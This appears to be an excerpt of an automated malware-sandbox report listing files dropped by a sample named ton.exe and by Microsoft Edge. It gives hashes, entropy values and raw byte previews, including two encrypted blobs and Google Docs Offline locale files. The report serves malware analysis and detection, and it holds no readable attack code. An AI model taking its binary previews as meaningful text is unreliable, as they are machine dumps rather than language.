                                                                                                                                                                                                                                                                                                    Preview:(.Y..^.....-1..RrLS3.x...%X..Y2.P.!..........F.#.....).!.f./../..J.c{.>.S.e5.F.[..G....n.h...s.W%(O...2.@..*}.K2L.X.[tt.*.iM..+...2..!...{}^..0..W.d!Lz.p..._.J.y[i...D^.&C].$......)...,.6...>.n~.......`e33.........._O....5[Fh...8.L...^...7H...c.4v..O).:..#KH .>...&.....{P;.6..).5..[J...b..[.#'P.,...;5.y>..4.-J.....a..s...."zk...{..).......l...3.kY.|*...Mv..)o._.S.F..:.V.F..K..).<......F-..uf....RG.Z..HO..|.N...a_@kS.X1.b..wzw~PS%.MSA..l....e./...F.d...m.L...~.(.$......`."../..h..<j...y.@.Ed}`^,Z..+..c.....".x...z..he'.?..@.t.=^....JZSn.y...2.,.....N./&(.;..I..H3.S...b_.E0...dql..'Q.2..O*s..J........z...!.F...8..@#c.U......RP.m8..TW......^.....p_.k.d...2.'..U.-...gD...-B!j..X..l..O....k.!..._.[.......DS..n..%..uy....M,.-.4./.{a....p.~..>.zg.../~.#..?W...(\]..F....8....!..6.).{O.....O.U.T0.[..1..t........>..[./B.....-._...h..tf`...iW....`..9....R5..9u...9..t.Z....&..><l..O..O0f...-..x.1N..Ez#>.gd..;f...R.w8/6v..:O...U...Re.Z+Kv.....
                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\ton.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):68608
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.99718634479775
                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                    SSDEEP:1536:RuJmuvIMPGo8938fVQKilsSwZ6DZvaE0/VHNzs1lot2s7JVGWB7:sFtPGojql9wZYZvyVtzMb8JVt7
                                                                                                                                                                                                                                                                                                    MD5:0980772D293AD7DBFFD628FBC02A9BC1
                                                                                                                                                                                                                                                                                                    SHA1:C9059DC665D32DE6510961CC9715015354FB8217
                                                                                                                                                                                                                                                                                                    SHA-256:ECD2D087E96F8CDE4282F79FE7A3AB4A92F3C0121B800B309780B24C7A69CE7C
                                                                                                                                                                                                                                                                                                    SHA-512:1281903428CDD50AB760E39712826A3AACAAD9F5D9E37DC6741ED3D2AE2ED16DEE46799FE16DE7BE57B82446ACBF64A89EF9A8FFE52A6FC8469205012EDF793A
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:/.....>'.e-z....1G[mh...h...P.N.w*../...iW...Bu.,5...~......m..tX..S....E..P..Mk.z.*z.._.`..N.l9.d....bS[......|.L(.P..@..)w/c\...!Lc..0.qrPca.NwF......t$..\N..M.f....l...n....l.-.^0..U..dY...7....3..J2...:.._|../\....m....x..:.....#.?.Q.h$b.$.H.m.1wS...*n.....=m.l=i.....o..T..9T...8..R.s.[.W...p:&,.J.M...Z...h#./h.~h.....+4..u...Z....J.~[.N.d..2..!........L8UZ....r'P7'G'...E.8M.x3........L....uH).yR..z.7%.i......_.l.........n;L:...8..')e...;.G...9.hJ..#..VBl..l'T.FAGQ._@.YF.o....C...0f8.?".Ou0..9.2.#.$..?........m&...^XY.].0..,l..\.6s=.Xehj...-y_....1.T..H.Ub...L...#.-.ClG;0../..T.I/g.Hl.......G5!.)_.DK.RC.4.{E...F.D._|.&..7...5.5....B.]....7....;.....D#..pH%{8I...&...g24.{8..0[..X5b..Y'....W.|.......2..dlu.s.er...........m"x.<...i..j[-%....Z.0..8.a.........H...'W..G..|/..#C7.C.+y.&b..-....Oq.f_.*........@...l.p....*..Pk..c..*.\...RW-.8d@.7H..Y.;.<....e...n%Q..M....1...o.K.J.........$.8...E6o.....59.....B.._=.O..z.l*....q"V.....Z.._..
                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\ton.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):57344
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.996964035467588
                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                    SSDEEP:1536:UA/YjtciQVNrFbALBHqNBJIo3bAUTmBl7hW:U6kS7NrROH2eo0UyDhW
                                                                                                                                                                                                                                                                                                    MD5:BA22DE6A329D2059F717F2B29FAC3016
                                                                                                                                                                                                                                                                                                    SHA1:C48E41BF0352E3754E8D049DB592F5818C4F9854
                                                                                                                                                                                                                                                                                                    SHA-256:4EC72827B7EEE553EA71AC3522CDCAF12652B50C9EBF622E2E387AC7CED0FD28
                                                                                                                                                                                                                                                                                                    SHA-512:007F5856C665D6834B49409551AE3C7C8CA51003B8CC139CCA39DDD5D1811DDC6CDF78E8A54B2A87F0FBD4C20E61127FF8738BF2821D1FFEA7DD85F73E12A0A1
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:.N......h..!..W. .h.X3.B....a...o.8.....*l.qAF.OO{w............07.<..c.ZT..^P..4m...Fc..;}.!.e.q9...Z..P>.Z..s....!.%u..(T?2......k.'q..$.%....d_q.OG..*J.U.........Q..0...x...`..O..A.c...7q5s....$.K..Y'.DP.o.Z.+...iu.#[...)...p.n..&.n<e........:..(6X....v......7..d,.L..Z.~...6.j....>KX.....8......`.P..V......z.......".9 (}.O\0......,..o.%Q.........3.._...../.1......UW)...l..C...yv^v.e...t...T..MN6.H....,P3.>X._...\.4......^.......80...9.f.5..2>.'yp.@....!}.kj.I.&.D...?T.~..+.+...nKYh.G.I%J....{.Yu[.Z....Y..Q:@.n.a6.|2.....W...!...F.*OK.i.H....4>'eE>.C..H.3..Ed2.........y<....".jS..rp..?....../~...RZ?...] ..\.P.......d..:C..loI.............(t.f..F..;@_..........=o9..b....).....lN...hx|=.k... !...h<u.#..M5~....O163...#.Z..J......e0...p.B.1...s....;.......n,.42.n.Y`. /..%.Na... ....HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1658
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.41256911939953
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx09w5OE09F5M:JIVuwEw5MUFZLBQLt9kM
                                                                                                                                                                                                                                                                                                    MD5:E6A332D4F5F3BFCA5C046D35CF2A6258
                                                                                                                                                                                                                                                                                                    SHA1:A810FFFAF57165A7A991D6A023E3FD247512BCF9
                                                                                                                                                                                                                                                                                                    SHA-256:402981D9368D4AF92CAA686290285FB32A456C138EC06DAAF1DAE232056C3F46
                                                                                                                                                                                                                                                                                                    SHA-512:50ECC6D082F2B65391EF88EDA6C3B7832BDA51B8E810A8EE37913FEC5FAD89542E9C104719A13FF4B3A8B3F1033CA31755E30A669FE7AF0EC5F03F2E06D493AA
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):138356
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                                    MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                                    SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                                    SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                                    SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):4982
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                    MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                    SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                    SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                    SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):908
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                    MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                    SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                    SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                    SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1285
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                    MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                    SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                    SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                    SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1244
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                    MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                    SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                    SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                    SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):977
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                    MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                    SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                    SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                    SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):3107
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                    MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                    SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                    SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                    SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1389
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                    MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                    SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                    SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                    SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1763
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                    MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                    SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                    SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                    SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):930
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                    MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                    SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                    SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                    SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):913
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                    Encrypted:false
